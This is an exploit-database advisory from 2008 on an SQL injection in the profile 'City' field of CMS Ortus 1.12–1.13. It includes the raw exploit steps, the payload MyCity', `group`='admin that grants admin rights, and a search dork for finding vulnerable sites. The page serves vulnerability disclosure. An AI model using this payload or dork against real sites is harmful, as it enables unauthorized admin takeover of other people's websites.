SQL Injection Vulnerability in POST Form

vendor:

CMS Ortus

by:

otmorozok428

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS Ortus

Affected Version From: 1.12

Affected Version To: 1.13

Patch Exists: NO

Related CWE: N/A

CPE: a:ortus:cms_ortus

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL Injection Vulnerability in POST Form

A SQL injection vulnerability exists in the POST form of CMS Ortus 1.12 and 1.13. An attacker can exploit this vulnerability by registering on the website, authenticating, and then editing the user profile. The attacker can then inject malicious SQL code into the “City” field to gain admin rights and access the admin area.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Author: otmorozok428, http://forum.antichat.ru 

Products: CMS Ortus 1.12, CMS Ortus 1.13

Vendor: http://ortus.nirn.ru

Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip

Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=



SQL Injection Vulnerability in POST Form:

http://www.site.com/index.php?mod=users_edit_pub

"City" field: [SQL Injection]



EXAMPLE:

1. You need to register first

   http://www.site.com/index.php?mod=users_add

2. Authentication

   http://www.site.com/index.php?mod=auth

3. Edit user profile next

   http://www.site.com/index.php?mod=users_edit_pub

4. Exploit "City" field (receive admin rights)

   MyCity', `group`='admin

5. Login to admin area

   http://www.site.com/auth.php




You can see demo video here:

http://depositfiles.com/files/h8sbwikey

# milw0rm.com [2008-11-26]